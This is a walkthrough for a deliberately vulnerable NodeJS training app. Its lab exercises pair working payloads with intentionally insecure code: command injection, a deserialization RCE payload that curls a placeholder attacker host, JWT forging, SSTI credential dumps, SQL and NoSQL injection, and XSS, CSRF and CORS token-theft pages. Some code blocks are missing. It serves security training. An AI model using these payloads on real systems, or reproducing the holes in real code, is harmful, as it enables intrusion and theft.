# **Vulnerable NodeJS Application**

## github.com/payatu/vuln-nodejs-app

## • 1. Command Injection

- Exploit
- Vulnerable Code
- Fix

## • 2. Insecure Deserialization

- Exploit
- <u>Vulnerable code</u>
- <u>Fix</u>

## • 3. JWT weak secret

- Exploit
- Vulnerable Code
- Fix

## • <u>4. IDOR</u>

- Exploit
- Vulnerable Code
- Fix

## • <u>5. XSS</u>

- Case 1: User supplied input rendered without any sanitization
- Case 2: User supplied input rendered inside script tag
- Case 3: XSS inside JSON object

## • <u>6. SSTI</u>

- Exploit
- <u>Vulnerable Code</u>

#### • 7. SQL Injection:

- Exploit
- Vulnerable Code

### • <u>8. XXE</u>

- Exploit
- Vulnerable code:

## • <u>9. SSRF via PDF generator</u>

- Exploit
- Vulnerable Code

## • 10. postMessage XSS

- Exploit
- Vulnerable Code

## • 11. postMessage CSRF

- Exploit
- Vulnerable Code

## • 12 Information Disclosure using addEventListener

- Exploit
- Vulnerable code:

## • 13 CORS Information Disclosure

- Exploit:
- Vulnerable Code

## • 14 CORS CSRF

- Exploit:
- Vulnerable Code

## • 15 Insecure 2FA implementation.

• Exploit:

#### • 16. Cross-Site WebSocket Hijacking

- Exploit
- <u>Vulnerable Code</u>
- Fix

- 17 WebSocket XSS
  - Exploit
  - <u>Vulnerable code</u>
- 18 ReactJS XSS
  - Exploit
  - Vulnerable Code
- 19. React ref-innerHTML XSS
  - Exploit
  - <u>Vulnerable code</u>
- 20. NoSQL Injection
  - Exploit
  - <u>Vulnerable code</u>
- 21. GraphQL Information Disclosure
  - Exploit
  - <u>Vulnerable Code</u>
- 22. GraphQL SQLi
  - Exploit
  - <u>Vulnerable code:</u>
- 23. GraphQL CSRF
  - Exploit
  - Vulnerable code
- 24. GraphQL IDOR
  - Exploit
  - <u>Vulnerable code</u>
- 25 XSS using SVG file upload
  - Exploit
  - <u>Vulnerable Code</u>
- 26 JSONP Injection
  - <u>Exploit</u>
  - Vulnerable Code
- NoSQL JavaScript Injection
  - Exploit
  - <u>Vulnerable Code</u>

## 1. Command Injection

Application is using child process.exec() method to run ping on user supplied input your goal is to achieve the RCE.

#### **Exploit**

Application is adding user supplied input to ping command without any sanitization and executing it using **exec** method that can lead to RCE if malicious input is provided, following payload will execute the whoami command on the server after running ping.

```
google.com; whoami
```

#### **Vulnerable Code**

Route: /routes/app.js

```
router.route('/ping')
   .get(authenticateToken, vuln_controller.ping_get)
   .post(authenticateToken, vuln_controller.ping_post); // ping_post function in vuln_controller.js file
```

Controller: /controllers/vuln\_controller.js

```
const ping_post = (req, res) => {
  const ping = req.body.ping;
  const ping1 = req.body.ping1;
  if (ping) {
    exec('ping -c 3 ' + req.body.ping, function (err, stdout, stderr) {
      output = stdout + stderr;
      res.render('ping', {
        output: output,
            pingoutput: null
      });
    });
  });
}
```

#### Fix

Use child\_process package method **execFile** that starts a specific program and takes an array of arguments.

#### 2. Insecure Deserialization

Application is using node-serialize method unserialize to parse the preference cookie, your goal is to acheive the RCE.

### **Exploit**

**Step 1:** Create a serialized payload using node-serialize module.

```
// serialize.js
var serialize = require('node-serialize')

// change yourwebsite.com to your host to receive callback
var payload = {payload: function(){require('child_process').exec('curl yourwebsite.com', function(error, stdout, stderr)
{console.log(stdout)})}} callback
console.log(serialize.serialize(payload))
```

Save the above code in a file and run it you will get the serialized payload.

```
> node serialize.js
{"payload":"_$$ND_FUNC$$_function(){require('child_process').exec('curl yourwebsite.com', function(error, stdout, stderr)
{console.log(stdout)})}"}
```

Now we have a serialized payload that can be deserialized using unserialize() function but the code will not execute until we trigger the function corresponding to the payload property to do that we can use the immediately invoked function expression for calling the function by adding () after the function, our final payload will look like this:

```
{"payload":"_$$ND_FUNC$$_function(){require('child_process').exec('curl yourwebsite.com', function(error, stdout, stderr)
{console.log(stdout)})}()"}
```

Now replace this payload value with the preference cookie value in /save-preference POST request and you will receive a callback request on your attacker server.

Reference: https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

#### **Vulnerable code**

Request method, endpoint, injection point

```
Request method: POST
Endpoint: /save-preference
Injection point: preference cookie
```

Route: /app/routes.js

```
router.post('/save-preference', authenticateToken, vuln_controller.save_preference_post)
```

Controller: /controllers/vuln\_controller.js

```
const save_preference_post = (req, res) => {
    const preference = serialize.unserialize(req.cookies.preference);
    res.send(preference);
}
```

## Fix

Do not use unserialize function on untrusted input.

## 3. JWT weak secret

Application is using the weak secret to create JSON web token that can lead to authentication bypass, your goal is to access the API Key of user vulnlabAdmin.

## **Exploit**

- 1. Get the authToken value from the cookie.
- 2. Save the token to a file.
- 3. Crack the secret using john.

```
$ john authToken.txt
```

4. Understand the JWT token structure to create a valid token.

```
# base64 decoded jwt token
{"alg":"HS256","typ":"JWT"}{"username":"vulnlabAdmin","iat":1646548200}⊵�.S�;▶�æw�����..�������Ç��:�
```

- 5. Application is using the HS256 algorithm to sign the payload and in the payload it has a username that it is for identifying the user.
- 6. Use the secret to create a valid JWT for user **vulnlabAdmin** using **jsonwebtoken** package.

```
// createJwtToken.js
var jwt = require('jsonwebtoken')
```

```
const payload = {"username": "vulnlabAdmin"}
console.log(jwt.sign(payload, "secret"))
```

```
$ node jwt.js
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InZ1bG5sYWJBZG1pbiIsImlhdCI6MTYONjU00TIyMn0.jntBGk0Dw7hiX81yo3-
9afj0djZ3f-o5P0UapJbVCW
```

5. Now that we have a valid JWT for user **vulnlabAdmin** we can use it in **authToken** cookie value to access the API token of **vulnlabAdmin** user and complete this exercise.

#### **Vulnerable Code**

```
# /controllers/vuln_controllers.js
function generateAccessToken(username) {
    const payload = { "username": username };
    return jwt.sign(payload, process.env.JWT_SECRET);
}
# /.env
JWT_SECRET=secret
```

#### Fix

Use strong secret to generate JWT

## 4. IDOR

Application is loading Notes saved in a user account based on userid supplied in the URL path your goal is to access notes saved in vulnlabAdmin user account by performing IDOR.

## Request method & endpoint

```
Request method: GET endpoint: /notes/user/:userid
```

### **Exploit**

- 1. Go to /notes and create a note while intercepting request using burp suite.
- 2. Forward the note saving request and you will see another request to /notes/user/:userid to load your notes send this request to the repeater and guess the userid of user vulnlabAdmin to access his notes.

### **Vulnerable Code**

Route: /routes/app.js

```
router.get('/notes/user/:userid', authenticateToken, vuln_controller.userNotes_get);
```

## Controller: /controllers/vulln\_controller.js

```
const userNotes_get = (req, res) => {
   const userid = req.params.userid;
   Notes.findAll({ where: { userid: userid } })
        .then((queryResult) => {
            res.header("Content-Type", "application/json")
            res.send(JSON.stringify(queryResult));
        })
}
```

#### Fix

Use id available in req object to load user notes instead of using user supplied input.

```
const userNotes_get = (req, res) => {
   const userid = req.user.id; // fixed by using user id from req object returned from authenticateToken middleware
   Notes.findAll({ where: { userid : userid } })
        .then((queryResult) => {
            res.header("Content-Type", "application/json")
            res.send(JSON.stringify(queryResult));
        })
}
```

## **5. XSS**

Three different XSS cases are covered in this exercise depending on the ejs template syntax used to display user supplied input and context.

Route: /routes/app.js

```
router.get('/xss', authenticateToken, vuln_controller.xss_lab);
```

Controller: /controllers/vuln\_controller.js

```
const xss_lab = (req, res) => {
    const xss1 = req.query.xss1;
    const xss2 = req.query.xss2;
    const xss3 = req.query.xss3;
    res.render('xss', {
        xss1: xss1,
        xss2: xss2,
        xss3: xss3
    });
}
```

#### Case 1: User supplied input rendered without any sanitization

View: /views/xss.ejs

Application is rendering user supplied input using ejs raw output syntax ( <%- xss1 %> ) which does not encode special characters.

## Case 2: User supplied input rendered inside script tag

View: /views/xss.ejs

```
<% if (xss2 || xss3){%>
<script>
var number = <%= xss2 %>;
...
</script>
<% }%>
```

In this case, the application is rendering user supplied input using ejs escape output syntax (<%= xss2 %>) which escapes special characters but the reflection is happening inside the script tag so an attacker can execute the XSS attack without using the special characters.

## Case 3: XSS inside JSON object

View: /views/xss.ejs

```
<% if (xss2 || xss3){%>
<script>
...
```

```
var b = <%- JSON.stringify({"username": xss3})%>;
</script>
<% }%>
```

In this case, the application is using <%-JSON.stringify("{username": xss3})%> to create JSON object with user supplied input it is using ejs raw output syntax <%- to create a valid JSON object it does not use <%= output syntax because it will also encode the double quotes but JSON.stringify will escape double quotes that means we have to find a way to break out of the double quote to do that we will use this payload </script> <script>alert(1)</script> .

## 6. SSTI

Application is directly concatenating user supplied input to the template that can lead to SSTI your goal is to steal the database credentials.

### **Exploit**

- 1. Go to /ssti?path=helloworld .
- 2. You will notice that helloworld is displayed in the response, now try ssti polyglot payload \${{<%25[%25'"}}%25\. in the path parameter you will get the following error message which suggests that template engine uses <%, %> for opening and closing tag one such template engine is ejs.

```
Error: Could not find matching close tag for "<%".
```

3. Let's perform simple multiply using following payload.

```
<%25= 7*7%25>
```

- 4. And we get 49 in the response.
- 5. Time to get database credentials from database for that we will use the following payload

```
<%25=JSON.stringify(process.env)%25>
```

#### **Vulnerable Code**

Request method, endpoint, query parameter

```
Request method: GET
Endpoint: /ssti
query parameter: path
```

Route: /routes/app.js

```
router.get('/ssti', authenticateToken, vuln_controller.ssti);
```

Controller: /controllers/vuln\_controller.js

## 7. SQL Injection:

Application is concatenating user supplied input to SQL query without any validation.

## **Exploit**

- 1. Go to /sqli and select station from list and click on **check** while intercepting request using burp suite.
- 2. Add ' at the end of the URL path you will see the SQL error from here you can proceed to get database details.

#### **Vulnerable Code**

Route: /routes/app.js

```
router.get('/sqli/:from-:to', authenticateToken, vuln_controller.sqli_check_train_get);
```

Controller: /controllers/vuln\_controller.js

```
const sqli_check_train_get = (req, res) => {
   const from = req.params.from;
   const to = req.params.to;
   const q = "SELECT ntrains FROM trains where from_stnt='" + from + "' and to_stnt='" + to + "';";
   con.connect(function (err) {
      if (err) throw err;
      con.query(q, (err, results) => {
        if (err) {
            res.send(err);
        };
        res.send(JSON.stringify(results));
      });
   });
}
```

#### **8. XXE**

Application is using libxmljs to parse XML input but noent flag is set to true which enables external entities parsing. your goal is to read /etc/passwd file.

#### **Exploit**

- 1. Go to /xxe and add a random comment while intercepting requests using burp suite.
- 2. Change the comment parameter value with the following payload to read /etc/passwd file.

## **Vulnerable code:**

Routes: /routes/app.js

```
router.post('/comment', authenticateToken, vuln_controller.xxe_comment);
```

Controller: /controllers/vuln\_handler.js

```
const xxe_comment = (req, res) => {
   const rawcomment = req.body.comment;
   const parsecomment = libxmljs.parseXmlString(rawcomment, { noent: true, noblanks: true });
   var comment = parsecomment.get('//content');
   comment = comment.text();
   res.send(comment);
}
```

## 9. SSRF via PDF generator

Application is using html-pdf-node package to generate ticket PDF which takes HTML page as an input and generates the PDF but application is not sanitizing user input before generating the HTML page an attacker can use it to perform the SSRF.

## **Exploit**

Inject the following payload in the passenger name field to perform the SSRF and don't forget to change yourwebsite.com to your webserver to receive a callback

```
<iframe src="http://yourwebsite.com/asdf"/>
```

#### **Vulnerable Code**

Route: /routes/app.js

```
router.get('/ticket/booking', authenticateToken, vuln_controller.ticket_booking_get);
```

#### Controller: /controllers/vuln\_controller.js

```
const ticket_booking_get = (req, res) => {
    let options = { path: "test.pdf" };
    let file = { url: `http://localhost:${process.env.HOST_PORT}/ticket/generate_ticket?
passenger_name=${req.query.passenger_name}&from_stnt=${req.query.from_stnt}&to_stnt=${req.query.to_stnt}&date=${req.query.date}`};

    html_to_pdf.generatePdf(file, options).then(pdfBuffer => {
        res.header('Content-Disposition', 'attachment; filename="ticket.pdf"');
        res.send(pdfBuffer);
    });
}
```

Application is receiving ticket details from the user and then using it to generate HTML page by using html-pdf-node package function generatePdf that takes URL as an input and generates the PDF from the received response.

## 10. postMessage XSS

The user edit page has an addEventListener() call that listens for the web message and inserts that message to a <div> without verifying the origin from where it received the message.

## **Exploit**

Create an HTML page with the following code and host it on your server to perform the XSS

```
<html>
<body>
<iframe src="http://tauheedkhan.com:9000/user-edit" id="victimWebsite" width="100%" height="100%"></iframe>
<script>
    document.addEventListener('readystatechange', () =>{
        victimWebsite.contentWindow.postMessage("<img src=X onerror=alert(\"HACKED\")>", '*')
    })
</script>
</body>
</html>
```

#### **Vulnerable Code**

View: /views/user-edit.ejs

```
window.addEventListener("message", function(event){
    document.getElementById("displayMessage").removeAttribute('hidden')
    document.getElementById("displayMessage").innerHTML = event.data;
})
```

## 11. postMessage CSRF

Organization Management page has a functionality to add users to the organization when the org owner clicks on the Add Users button it opens a new popup window then the org owner selects a user from the list and clicks on the Add button this button posts a message using postMessage() to the tab which opened it then the opener tab receives the selected username using addEventListener() and sends the HTTP request to add that

user in the org. Here opener tab does not verify the origin from which it received the message which means any origin can send an arbitrary username using postMessage() and that username will be added to the organization.

#### **Exploit**

- 1. First create an organization in the victim account.
- 2. Create a hacker account.
- 3. Save the following code in an HTML file and replace the username with your hacker username and send that to the victim user your hacker user will get added to the victim organization.

```
<html>
<body>
<iframe src="http://localhost:9000/organization" id="victimWebsite" width="100%" height="100%"></iframe>
<script>
    document.addEventListener('readystatechange', () =>{
        victimWebsite.contentWindow.postMessage("<hacker_username>", '*')
    })
</script>
</body>
</html>
```

#### **Vulnerable Code**

#### View: /views/organization.ejs

```
window.addEventListener('message', function (event) {
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function () {
    if (xhr.readyState == XMLHttpRequest.DONE && xhr.status == 200) {
        document.getElementById("userAddMessage").innerHTML = "User Added";
        loadUsers();
    }
}

xhr.open('POST', window.location.origin + '/organization/add-user')
xhr.withCredentials = true;
xhr.setRequestHeader('Authorization', '<%=token%>');
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send("user=" + event.data);
})
```

## 12 Information Disclosure using addEventListener

In this exercise you will learn how insecure use of postMessage can be used to steal the sensitive information, /api-token page has a button to show your API Key, when you click on it, it will open a new popup window which will fetch the user API token and send it to the opener window using postmessage, Since it sends the message to the opener window without specifically specifying the origin, An attacker domain which opens the /api-token/show will be able to receive the API token.

#### **Exploit**

Save the following HTML code in an HTML file, host it on your server and send the link to the victim you will see a popup showing the victim API token to further exploit you can send the API token to your attacker server.

```
<html>
<body>
<script>
window.open("http://tauheedkhan.com:9000/api-token/show", "popup");
window.addEventListener("message", function(event){
    alert(event.data.token);
})
</script>
</body>
</html>
```

#### Vulnerable code:

View: /views/webmessage-api-token-popup.ejs

```
<script>
  var token = "<%-apiToken%>";
  window.opener.postMessage({'token': token}, '*')
  window.close()
</script>
```

#### 13 CORS Information Disclosure

cors-api-token endpoint is vulnerable to Cross-Origin Resource Sharing your goal is to exploit it to steal victim user API Token.

#### **Exploit:**

1. Save the following HTML code in an HTML file.

```
<html>
<body>
<center>CORS Exploiting POC</center>
<script>
document.addEventListener('readystatechange', ()=>{
  fetch('http://tauheedkhan.com:9000/cors-api-token', {credentials: 'include'})
    .then((response)=>{
     return response.text()
   })
    .then((html)=>{}
     var parser = new DOMParser();
     var doc = parser.parseFromString(html, "text/html")
     var apiToken = doc.getElementById("apiToken").value;
     alert(apiToken);
   })
    .catch((err)=>{
     console.log(`Error: ${err}`)
   })
 })
</script>
</body>
</html>
```

2. Open the link in your victim browser and you will see a popup with a user API token you can also transfer this API token to your attacker server.

#### **Vulnerable Code**

## Request endpoint & method

```
Endpoint: /cors-api-token
Method: GET
```

## Route: /routes/app.js

```
router.get('/cors-api-token', authenticateToken, vuln_controller.cors_api_token_get);
```

## Controller: /controllers/vuln\_controller.js

```
const cors_api_token_get = (req, res) => {
   const apiToken = req.user.apiToken;
   if (req.get('origin') !== undefined) {
      res.header("Access-Control-Allow-Origin", req.get('origin'));
      res.header("Access-Control-Allow-Credentials", 'true');
   }
```

```
res.render('cors-api-token', { apiToken })
}
```

## 14 CORS CSRF

cors-csrf-edit-password endpoint is used for updating password this endpoint only accepts content type application/json and it is not possible to send this content type without application allowing cross origin connection so we test for it and find out that endpoint is vulnerable to Cross Origin Resource Sharing we can exploit it to perform CSRF and change victim password.

## **Exploit:**

1. Host the following code in an HTML file on your attacker server.

2. Open the HTML file in the victim browser and you will see a popup "Password update Successful!".

### **Vulnerable Code**

#### Request endpoint, method, content-type

```
Endpoint: /cors-csrf-edit-password
Method: POST
Content-Type: application/json
```

## Route: /routes/app.js

```
router.route('/cors-csrf-edit-password')
    .get(authenticateToken, vuln_controller.cors_csrf_edit_password_get)
    .post(authenticateToken, vuln_controller.cors_csrf_edit_password_post)
    .options(vuln_controller.cors_csrf_edit_password_option);
```

## Controller: /controllers/vuln\_controller.js

```
// handle Preflight (OPTIONS) request
const cors_csrf_edit_password_option = (req, res) => {
   if (req.get('origin') !== undefined) {
      res.header("Access-Control-Allow-Origin", req.get('origin'));
      res.header("Access-Control-Allow-Credentials", 'true');
      res.header("Access-Control-Allow-Methods", 'GET, POST');
      res.header("Access-Control-Allow-Headers", 'Content-Type');
      res.header("Access-Control-Max-Age", '5');
```

```
}
res.send(200);
}

// handle edit password request

const cors_csrf_edit_password_post = (req, res) => {
    if (req.get('origin') !== undefined) {
        res.header("Access-Control-Allow-Origin", req.get('origin'));
        res.header("Access-Control-Allow-Credentials", 'true');
    }

    if (!req.is('application/json')) return res.status(400).send('Invalid content type')
    if (req.body.password == '' || req.body.password == undefined || req.body.password == null) return res.sendStatus('400');

    Users.update({ password: md5(req.body.password) }, { where: { username: req.user.username } })

        .then((queryResults) => {
            res.send("Password update Successful!");
        })
        .catch((err) => {
            res.send('Unexpected error occured');
        })
}
```

## 15 Insecure 2FA implementation.

Application has implemented 2FA insecurely it presents a 2FA page after login if users have enabled it but an attacker can bypass it by forced browsing.

#### **Exploit:**

- 1. Setup 2FA on your victim account logout from the account.
- 2. As an attacker login to the victim's account you will see the 2FA page but you can easily bypass it by using the forced browsing technique.

## 16. Cross-Site WebSocket Hijacking

Application is using an old version of socket.io which by default enables CORS your goal is to exploit it to access the wallet information of the victim user.

#### **Exploit**

1. Save the following code in an HTML file on your server.

2. Open the HTML file on your victim browser and you will see an alert showing the wallet information of the victim user.

## **Vulnerable Code**

/package.json

```
"socket.io": "2.3.0",
```

#### Fix

Use the latest version of the socket.io package to fix the issue as the version used in the application by default enables the CORS.

## 17 WebSocket XSS

Application is using socket.io for real-time chat but has only implemented client-side input sanitization which can be bypassed by intercepting the request before it goes to the server.

#### **Exploit**

- 1. Create two accounts victim & hacker.
- 2. In the first browser login as a victim.
- 3. In the second browser login as hacker go to /websocket-xss and send a message while intercepting it using burp suite edit message value to perform XSS.

#### Vulnerable code

controller: /server.js

```
socket.on('new_message', (data) => {
  io.sockets.emit('new_message', { message: data.message, username: socket.user.username, login_user: socket.user.username
})
})
```

#### View: /views/websocket-xss.ejs

```
socket.on('new_message', (data) => {
  const current_messages = message_box.innerHTML
  if (data.username === current_user) {
    message_box.innerHTML = current_messages + `<b> You:</b>
${data.message}</pr>
  } else {
    message_box.innerHTML = current_messages + `<b>
${data.username}:</b> ${data.message}</pr>
}
})
```

## 18 ReactJS XSS

Application is using ReactJS which provides by default protection from XSS attacks by encoding dangerous characters before appending it to the page but there are cases when it will not protect from XSS attacks, for example: when the application passes user-supplied input to href attribute.

## **Exploit**

Application is taking user-supplied website URL and passing it to anchor tag href attribute.

1. Go to /react-href-xss and inject the following payload in the website input field and once a user clicks on the URL they will see a popup.

```
jsjavascript:alert(1)
```

2. But currently this is a self XSS to attack other users we have to find a way to update other users' profiles which can be achieved by performing CSRF as the server also accepts application/x-www-form-urlencoding content-type.

#### **Vulnerable Code**

#### Request method, endpoint, parameter

```
Method: POST
Endpoint: /react-xss
Parameter: website
```

#### Route: /routes/app.js

```
router.route('/react*')
    .get(authenticateToken, vuln_controller.react_xss_get)
    .post(vuln_controller.react_xss_post);
```

#### Controller: /controllers/vuln\_controller.js

```
const react_xss_post = (req, res) => {
   console.log(req);
   res.header("Access-Control-Allow-Origin", req.get('origin'));
   res.header("Access-Control-Allow-Credentials", 'true');
   res.send({ name: req.body.name, email: req.body.email, website: req.body.website });
}
```

### View: /vuln\_react\_app/src/MyComponents/React\_href\_xss.js

```
<div id="updated" hidden>

    Name: {this.state.name} <br />
    Email: {this.state.email} <br />
    Website: <a href={this.state.website}>{this.state.website}</a> <br />
    <button onClick={this.updateForm}>Edit</button>

</div>
```

## 19. React ref-innerHTML XSS

ReactJS provides an escape hatch to provide direct access to DOM elements. With direct access application can perform the desired operation, without requiring explicit support from React. There are two escape hatches provided by ReactJS which give access to native DOM elements: findDOMNode and createRef. In this exercise, the application is using refs with innerHTML property to display user-supplied input which makes it vulnerable to XSS.

## **Exploit**

1. Inject the following payload in the name, email & website field to confirm the XSS.

```
<img src=X onerror=alert(1)>
```

 $2. \ \mbox{Chain}$  this bug with CSRF to steal other users cookie.

#### Vulnerable code

#### Request method, endpoint & parameter

```
Method: POST
Endpoint: /react-xss
Parameter: name, email & website
```

### Route: /routes/app.js

```
router.route('/react*')
   .get(authenticateToken, vuln_controller.react_xss_get)
   .post(vuln_controller.react_xss_post);
```

#### Controller: /controllers/vuln\_controller.js

```
const react_xss_post = (req, res) => {
   console.log(req);
   res.header("Access-Control-Allow-Origin", req.get('origin'));
   res.header("Access-Control-Allow-Credentials", 'true');
   res.send({ name: req.body.name, email: req.body.email, website: req.body.website });
}
```

## 20. NoSQL Injection

Application is using MongoDB to handle user notes your goal is to read a note with the title SuperSecretNote by performing NoSQL injection.

#### **Exploit**

- 1. Go to /mongodb-notes save a note while intercepting request using burp suite forward this request then you will see one more request to /mongodb-notes/show-notes.
- 2. Now perform the NoSQLi to see all notes saved in the database by using following payload.

```
{"username":{"$ne":""}}
```

#### Vulnerable code

### Request method, endpoint, parameter

```
Method: POST
Endpoint: /mongodb-notes/show-notes
Parameter: username
```

#### Route: /routes/app.js

```
router.route('/mongodb-notes/show-notes')
   .post(authenticateToken, vuln_controller.mongodb_show_notes_post);
```

## Controller: /controllers/vuln\_controller.js

## 21. GraphQL Information Disclosure

Application is using GraphQL your goal is to disclose the information of other registered users.

#### **Exploit**

If an application is using graphql and the introspection query is not disabled we can find out all the queries and see if any query is available that can leak sensitive information.

- 1. Go to graphql endpoint /graphql .
- 2. Refresh the page while intercepting request using burp suite transfer the request to repeater change the request method to POST and content-type to application/json and use the following introspection query in the body.

- 3. Copy the response and go to https://apis.guru/graphql-voyager/ website click on the change schema button switch to the introspection tab and paste the introspection query response click on display and you will have a complete query map.
- 4. In Query type you will see a listUsers query that returns a list of users, we will use this query to list all the users registered in the application.

5. Go back to the burp repeater tab and replace the introspection query with the following query, click on go and you will get the username & email of all registered users.

```
{"query": "query {listUsers{username email}}"}
```

## **Vulnerable Code**

### Route: /routes/app.js

1. Introspection query is not disabled that leaked the hidden endpoint.

```
router.use('/graphql', authenticateToken, graphqlHTTP({
    schema: schema,
    rootValue: vuln_controller.graphqlroot
}))
```

2. Lack of authorization check on the sensitive endpoint.

```
const graphqlroot = {
   user: graphql_GetUser,
   listUsers: graphql_AllUsers, //listUsers query handler
   updateProfile: graphql_UpdateProfile,
   showProfile: graphql_ShowProfile
}
```

```
async function graphql_AllUsers(){
   const q = "SELECT username, email from users;"
   await con.connect()
   const userdata = await con.promise().query(q)
   console.log(userdata[0][0])
   return userdata[0]
}
```

## 22. GraphQL SQLi

Application is trusting data supplied from the client and using it in a SQL query without proper sanitization to display the user profile your goal is to perform SQL injection.

#### Exploit

- 1. Go to /graphql-user-profile
- 2. Refresh the page while intercepting using burp suite, you will see a graphql request to user transfer it to the repeater.
- 3. Use the following payload in the username variable value to confirm SQLi.

```
'OR sleep(10)#

complete query

{"query":"query user($username: String!){ user(username: $username email }}","variables":{"username":"adamjones'OR sleep(10)#"}}
```

## **Vulnerable code:**

Route: /routes/app.js

```
router.use('/graphql', authenticateToken, graphqlHTTP({
    schema: schema,
    rootValue: vuln_controller.graphqlroot
}))
```

```
const graphqlroot = {
    user: graphql_GetUser, // user query handler
    listUsers: graphql_AllUsers,
    updateProfile: graphql_UpdateProfile,
    showProfile: graphql_ShowProfile
}
```

## graphql\_GetUser

```
async function graphql_GetUser(arg){
   const username = arg.username
   const q = "SELECT * FROM users where username='" + username + "';";
   await con.connect()
   const userdata = await con.promise().query(q)
   return userdata[0][0]
}
```

## 23. GraphQL CSRF

Application is using graphql to update user information, your goal is to change information of other users by performing CSRF attack.

### **Exploit**

express-graphql interpret request body depending upon the *Content-Type* header, which means we can perform the CSRF attack using application/x-www-form-urlencoded content-type or we can also perform CSRF by supplying query in GET parameter instead of using a POST request.

CSRF via POST request using appilication/x-www-form-urlencoded content-type.

- 1. Go to graphql-update-profile.
- 2. Change password while intercepting request using burp suite you will see graphQL password update request body.

```
{"query":"mutation { updateProfile(username: \"hacker\", email: \"hacker@gmail.com\", password: \"hacked\")}", "variables":null}
```

3. Change the content-type of request to application/x-www-form-urlencoded and also the request body with the following.

```
query=mutation { updateProfile(username: "hacker", email: "hacker@gmail.com", password: "hacked")}&variables=null
```

4. Send the request and you will see Update Successful! which shows that the application also accepts application/x-www-form-urlencoded data now you can create a CSRF exploit page and send it to the victim to change their email & password.

## **Vulnerable code**

Route: /routes/app.js

```
router.use('/graphql', authenticateToken, graphqlHTTP({
    schema: schema,
    rootValue: vuln_controller.graphqlroot
}))
```

## graphqlroot

```
const graphqlroot = {
    user: graphql_GetUser,
    listUsers: graphql_AllUsers,
    updateProfile: graphql_UpdateProfile, // updateProfile handler
    showProfile: graphql_ShowProfile
}
```

## graphql\_UpdateProfile

```
async function graphql_UpdateProfile(args, req){
   const updateQuery = `UPDATE users SET email='${args.email}', password='${md5(args.password)}' WHERE username =
'${req.user.username}';`
   await con.connect()
   const updateResult = await con.promise().query(updateQuery)
   const updateStatus = JSON.stringify(updateResult[0].affectedRows) // returns update status
   return "Update Successful!"
}
```

## 24. GraphQL IDOR

Application is trusting data supplied from the API client and using it to show the user details without performing the authorization check, your goal is to access details of other users by performing IDOR.

### **Exploit**

- 1. Go to /graphql-idor-show-profile .
- 2. Refresh the page while intercepting requests using burp suite, you will see a graphql request to show the user profile send that request to the repeater and change the value of variable userid to 1 and you will be able to see the details of admin user vulnlabAdmin

#### Vulnerable code

Route: /routes/app.js

```
router.use('/graphql', authenticateToken, graphqlHTTP({
    schema: schema,
    rootValue: vuln_controller.graphqlroot
}))
```

#### graphqlroot

```
const graphqlroot = {
   user: graphql_GetUser,
   listUsers: graphql_AllUsers,
   updateProfile: graphql_UpdateProfile,
   showProfile: graphql_ShowProfile // showProfile handler
}
```

### graphql ShowProfile

```
async function graphql_ShowProfile(args){
   const userid = args.userid
   const q = "SELECT * FROM users where id='" + userid + "';";
   await con.connect()
   const userdata = await con.promise().query(q)
   return userdata[0][0]
}
```

## 25 XSS using SVG file upload

Application allows users to upload .svg file as a profile picture your goal is to steal other user information by using XSS.

### **Exploit**

- 1. Login to the attacker account
- 2. Upload the following malicious .svg file to your account.

```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
```

```
<script type="text/javascript">
    alert('This app is probably vulnerable to XSS attacks!');
    </script>
</svg>
```

- 3. Right click on your profile image click on view image and it will open the image in a new tab and you will see an alert popup.
- 4. Now modify the XSS payload in the svg file to steal details from other users account such as their API token that is returned from this endpoint /jwt1/apiKey

5. Save the above code in a .svg file and upload it as your profile picture then copy the file URL and send it to your target and you will get apikey in your attacker server logs.

#### **Vulnerable Code**

Route: /routes/app.js

```
router.route('/svg-xss')
.get(authenticateToken, vuln_controller.svg_xss_get)
.post(authenticateToken, vuln_controller.svg_xss_fileupload_post);
```

Controller: /controllers/vuln\_controller.js

```
const svg_xss_fileupload_post = (req, res) => {
    if (!req.files || Object.keys(req.files).length === 0) {
        return res.status(400).send('No files were uploaded.');
    }
    const profilePic = req.files.profilePic;
    const profilePicName = profilePic.name
    const profilePicExtension = path.extname(profilePicName)
    const allowedExtension = ['.png', '.jpg', '.jpeg', '.svg'] // .svg file allowed
    if (!allowedExtension.includes(profilePicExtension)) {
        return res.status(422).send('Only .PNG, .JPEG, .SVG files are allowed')
    }
    ... snip ...
```

## 26 JSONP Injection

Application is using JSONP for fetching wallet balance information your goal is to steal the wallet information of other users.

## **Exploit**

- 1. First go to /jsonp-injection and analyze how the application is updating wallet balance information using burp suite.
- 2. Observe a GET request going to /jsonp-injection/wallet-usd-balance endpoint with a callback parameter.
- 3. Forward the request and observe that the response type is application/javascript because it is a JSONP endpoint.
- 4. Now send the request without callback parameter this time you will notice that server returned application/json content type so if you are doing testing don't forget to add '?callback' parameter on API endpoints to check if the target api provides jsonp response.
- 5. Since jsonp endpoint returns content-type application/javascript and allow us to specify callback function we can steal user information, by using jsonp endpoint as a script in our attacker website and then sending it to the victim to steal their information. 6. Copy the following code

in an HTML file and host it on your server.

6. Host the exploit file on your attacker server then send it to victim once they open the page you will get there wallet balance on your web server.

#### **Vulnerable Code**

Route: /routes/app.js

```
router.get('/jsonp-injection/wallet-usd-balance', authenticateToken, vuln_controller.jsonp_wallet_get);
```

Controller: /controllers/vuln\_controller.js

## **NoSQL JavaScript Injection**

Application has a password protected secret your goal is to access it by using NoSQL injection.

## **Exploit**

- 1. Go to ./nosql-js-injection
- 2. Enter random password while intercepting request using burpsuite.
- ${\it 3. Change the request payload with following injection payload.}\\$

```
{"password":"'; return ''=='"}
```

Above payload is similar to SQL injection payload ' or 1=1-- but here we injected javascript code as NoSQL database allow us to run javascript in database engine if passed through functions that allow it, such as swhere function that is being used in this exercise. Javascript execution exposes a dangerous attack surface if unsanitized user input finds it's way to the query.

## **Vulnerable Code**

Route: /routes/app.js

```
router.post('/unlock-secret', authenticateToken, vuln_controller.secret_post);
```

